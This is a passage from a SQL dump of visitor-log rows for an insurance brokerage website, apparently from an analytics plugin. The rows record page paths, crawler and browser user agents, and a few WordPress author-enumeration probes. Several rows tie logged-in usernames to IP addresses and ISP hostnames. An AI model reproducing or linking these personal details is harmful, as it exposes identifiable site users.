49','us','','','','','','','0','0',0),(12777,'0b_8ea5c9cc9376087591f7a4ba53b801cd','1459794099','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12779,'0b_5f3882d784efdd2e6bfb483a10eb52a4','1459794874','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(12782,'0b_5f3882d784efdd2e6bfb483a10eb52a4','1459794876','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(12785,'0b_5f3882d784efdd2e6bfb483a10eb52a4','1459794915','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(12788,'0b_5f3882d784efdd2e6bfb483a10eb52a4','1459794919','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','0',0),(12791,'0b_5f3882d784efdd2e6bfb483a10eb52a4','1459794925','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','51',0),(12792,'0b_5f3882d784efdd2e6bfb483a10eb52a4','1459794935','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','','','0','51',0),(12794,'0b_a605c742fc7b3b93632cc88e4a778e21','1459795046','66.249.83.150,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(12795,'0b_3c416287acd9ef34f5b29e66d2642dd3','1459795231','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12798,'0b_3c416287acd9ef34f5b29e66d2642dd3','1459795237','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(12800,'0b_3c416287acd9ef34f5b29e66d2642dd3','1459795266','157.55.39.68','msnbot-157-55-39-68.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(12801,'0b_0de0cf17bf7d5dcbd25bd6d42448e1bd','1459795439','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','','','','','','','0','0',0),(12803,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795442','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(12806,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795443','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(12809,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795575','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(12812,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795577','69.164.140.246','69.164.140.246.xchangetele.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(12815,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795606','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(12818,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795606','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(12821,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795607','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(12824,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795612','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(12827,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795668','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(12828,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795669','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(12830,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795674','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(12833,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795675','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(12836,'0b_e8f2d296f8064e479130ecc5867f57cc','1459795680','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(12839,'0b_5f3882d784efdd2e6bfb483a10eb52a4','1459795730','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','ykaufman','','0','51',0),(12840,'0b_5f3882d784efdd2e6bfb483a10eb52a4','1459795736','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','ykaufman','','0','51',0),(12843,'0b_3c416287acd9ef34f5b29e66d2642dd3','1459795896','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12845,'0b_e8f2d296f8064e479130ecc5867f57cc','1459796316','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(12846,'0b_e8f2d296f8064e479130ecc5867f57cc','1459796328','69.164.140.246','69.164.140.246.xchangetele.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(12848,'0b_811f1a1418b1abb542c86d00e573f72d','1459796635','69.58.178.58','69.58.178.58','/robots.txt','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(12851,'0b_811f1a1418b1abb542c86d00e573f72d','1459796680','69.58.178.58','69.58.178.58','/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(12854,'0b_d6c846fbb853e516dc6ca3324aa818bf','1459796720','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1280 x 1024','','','','joel10950','','0','0',0),(12855,'0b_d6c846fbb853e516dc6ca3324aa818bf','1459796721','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','joel10950','','0','0',0),(12857,'0b_d6c846fbb853e516dc6ca3324aa818bf','1459796724','75.99.148.62','ool-4b63943e.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','joel10950','','0','0',0),(12858,'0b_d6c846fbb853e516dc6ca3324aa818bf','1459796735','75.99.148.62','ool-4b63943e.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1280 x 1024','','','','joel10950','','0','51',0),(12861,'0b_7d2b2d3cdeab8699abb95d3c0ff9b406','1459796792','69.58.178.58','69.58.178.58','/','BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 ips-agent','','',0,'BlackBerry','BlackBerry','','','','','','','','0','0',0),(12864,'0b_811f1a1418b1abb542c86d00e573f72d','1459796831','69.58.178.58','69.58.178.58','/about-us/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(12867,'0b_811f1a1418b1abb542c86d00e573f72d','1459796872','69.58.178.58','69.58.178.58','/contact/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(12869,'0b_7d2b2d3cdeab8699abb95d3c0ff9b406','1459796913','69.58.178.58','69.58.178.58','/agent-tools/','BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 ips-agent','','',0,'BlackBerry','BlackBerry','','','','','','','','0','0',0),(12872,'0b_811f1a1418b1abb542c86d00e573f72d','1459796957','69.58.178.58','69.58.178.58','/register/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(12875,'0b_811f1a1418b1abb542c86d00e573f72d','1459797004','69.58.178.58','69.58.178.58','/insentives/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(12876,'0b_811f1a1418b1abb542c86d00e573f72d','1459797057','69.58.178.58','69.58.178.58','/licensing-contracting/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(12879,'0b_9bc50b2e49cea1cdca0ad3ffcac1c5c1','1459797120','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(12882,'0b_9bc50b2e49cea1cdca0ad3ffcac1c5c1','1459797122','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(12884,'0b_811f1a1418b1abb542c86d00e573f72d','1459797113','69.58.178.58','69.58.178.58','/carriers/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(12885,'0b_9bc50b2e49cea1cdca0ad3ffcac1c5c1','1459797125','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(12887,'0b_9bc50b2e49cea1cdca0ad3ffcac1c5c1','1459797131','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(12888,'0b_00b88794409294646747f9d4b9afc164','1459797169','52.38.64.191','ec2-52-38-64-191.us-west-2.compute.amazonaws.com','/robots.txt','Searchie/1.0 (a Storm-based crawler; https://www.searchie.org; admin@searchie.org)','','',0,'','','','','','Searchie','','','','0','0',0),(12891,'0b_00b88794409294646747f9d4b9afc164','1459797169','52.38.64.191','ec2-52-38-64-191.us-west-2.compute.amazonaws.com','/','Searchie/1.0 (a Storm-based crawler; https://www.searchie.org; admin@searchie.org)','','',0,'','','','','','Searchie','','','','0','0',0),(12893,'0b_811f1a1418b1abb542c86d00e573f72d','1459797167','69.58.178.58','69.58.178.58','/case-status/','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','','',0,'Linux','Firefox 14','','','','Unknown Spider','','','','0','0',0),(12896,'0b_7d2b2d3cdeab8699abb95d3c0ff9b406','1459797218','69.58.178.58','69.58.178.58','/forms/','BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 ips-agent','','',0,'BlackBerry','BlackBerry','','','','','','','','0','0',0),(12897,'0b_deb89c7665662a37287aae73550abb06','1459797511','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12900,'0b_f1dd69a7525ee062fb186cf8f890a5e3','1459798636','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(12902,'0b_f1dd69a7525ee062fb186cf8f890a5e3','1459798638','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(12905,'0b_48458b7708d9fe2139cb895a37564b0e','1459798720','74.126.55.206','74.126.55.206','/','Mozilla','','',0,'','','','','','','','','','0','0',0),(12906,'0b_abf3b2533ec3a073fdd9200fb138beb1','1459798934','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12908,'0b_c9e390dc4ab1db814c7cc2c7d492a4b5','1459798993','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(12909,'0b_c9e390dc4ab1db814c7cc2c7d492a4b5','1459798994','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(12911,'0b_4018107fce64606d51ce73a9c0aae04e','1459799185','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12912,'0b_7b3839af556e43f7cd940a4160192f2d','1459799499','78.46.50.246','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(12915,'0b_7b3839af556e43f7cd940a4160192f2d','1459799502','78.46.50.246','majestic12.co.uk','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(12918,'0b_7b3839af556e43f7cd940a4160192f2d','1459799505','78.46.50.246','majestic12.co.uk','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(12921,'0b_caffbf196a27ee4463127b99731d9e5a','1459800612','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(12924,'0b_caffbf196a27ee4463127b99731d9e5a','1459800614','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(12926,'0b_caffbf196a27ee4463127b99731d9e5a','1459800714','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(12929,'0b_caffbf196a27ee4463127b99731d9e5a','1459800715','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(12930,'0b_b92020f6ebeb46426dd2defbd5544a70','1459800789','52.38.142.187','ec2-52-38-142-187.us-west-2.compute.amazonaws.com','/?author=1','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.50','','',0,'WinXP','Opera 9','ru','','','','','','','0','0',0),(12932,'0b_caffbf196a27ee4463127b99731d9e5a','1459800958','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','','',0,'WinXP','IE 8','us','1024 x 768','','','','','','0','0',0),(12935,'0b_caffbf196a27ee4463127b99731d9e5a','1459800959','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','1024 x 768','','','','','','0','0',0),(12936,'0b_4da9ea4fecc1532a3ab71447d3e3634b','1459804499','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(12938,'0b_ead9dc0db90fe243d550d355a8b37e5c','1459805021','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(12939,'0b_c9fd2d3698f34b1d73afdeb0738e0059','1459806272','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(12941,'0b_c9fd2d3698f34b1d73afdeb0738e0059','1459806274','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(12942,'0b_d16829d0e07e371ea3238ad9cbd54fdd','1459807492','45.79.89.188','li1188-188.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(12945,'0b_f1db999985603c74b3b4d1ab1385d7e6','1459809126','66.249.75.95','crawl-66-249-75-95.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(12947,'0b_069518817b46fbb67b62aaa33be988a2','1459810577','208.115.111.66','208-115-111-66-reverse.wowrack.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(12950,'0b_849a99e56f9caa81933b94517a7c5ce7','1459811246','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(12951,'0b_f115842a0228599089239e065dfc934d','1459813298','130.185.155.10','130.185.155.10','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(12954,'0b_f115842a0228599089239e065dfc934d','1459813308','130.185.155.10','130.185.155.10','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(12957,'0b_f115842a0228599089239e065dfc934d','1459813318','130.185.155.10','130.185.155.10','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(12959,'0b_04b398b7839b5fbd037d9fb8e1c44d5b','1459814794','107.152.186.125','107.152.186.125','/about-us/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','0','0',0),(12960,'0b_fca35681cfc1cda11892b998c2abda4b','1459817275','58.110.107.37','d58-110-107-37.meb800.vic.optusnet.com.au','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com.au/','_notprovided_',1,'Win7','Chrome 49','au','1920 x 1080','Google AU','','','','','0','0',0),(12963,'0b_fca35681cfc1cda11892b998c2abda4b','1459817275','58.110.107.37','d58-110-107-37.meb800.vic.optusnet.com.au','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com.au/','_notprovided_',1,'Win7','Chrome 49','au','1920 x 1080','Google AU','','','','','0','0',0),(12965,'0b_fca35681cfc1cda11892b998c2abda4b','1459817279','58.110.107.37','d58-110-107-37.meb800.vic.optusnet.com.au','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','au','1920 x 1080','','','','','','0','0',0),(12968,'0b_fca35681cfc1cda11892b998c2abda4b','1459817300','58.110.107.37','d58-110-107-37.meb800.vic.optusnet.com.au','/contact/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 